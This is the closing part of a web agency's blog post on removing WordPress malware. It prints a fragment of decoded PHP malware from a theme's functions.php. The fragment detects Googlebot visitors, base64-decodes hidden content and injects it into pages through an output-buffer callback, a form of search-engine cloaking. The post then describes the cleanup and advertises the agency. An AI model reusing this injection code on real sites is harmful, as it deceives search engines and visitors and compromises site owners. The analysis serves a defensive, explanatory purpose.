$bot=is_googlebot_ip();
}

if ($bot){
$buf1=@base64_decode($text);
list($tag,$text1)=@explode(“|||”,$buf1);
if (($tag!=””)&&($text1!=””)){

if (stristr($p,$tag)){
if (($type==3)||($type==4)){
$p=@str_ireplace($tag,$tag.” “.$text1,$p);
}else{
$p=str_replace_first($tag, $tag.” “.$text1, $p);
}
}else{
$p=$p.$text1;
}
}

}
}

return $p;
}

ob_start(“callback_function_php”);

In looking through the code, we can see how the code is pulling in the malware and causing mischief on the website. Its important to identify where the code is placing itself, and if any other files are being generated. If so, they need to be removed.

The offending reversed Base64 string was deleted from functions.php and the problem successfully resolved and fixed.

So how exactly did this happen? Unfortunately, its hard to pinpoint this specific instance. There are a number of vulnerabilities which can occur from themes, plugins, or the server and web host itself. Without knowing when the script first inserted itself and attacked, and with updates to all of the aforementioned happening in-between the insertion, identification, and problem solving, the vulnerability which was the catalyst could have been fixed.

In the never-ending cat and mouse game of WordPress malware, it is important to take appropriate security measures to ensure your WordPress site reduces the chances being successfully targeted. It is incredibly important to resolve malware issues as soon as possible, before search engines such as Google post malware warnings about your website when people try to find you via search. We at Frog Stone Media have encountered an inordinate number of malware across a variety of clients. We work with several other agencies in providing support, security audits, and fixes. We’re happy to work with you, too.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.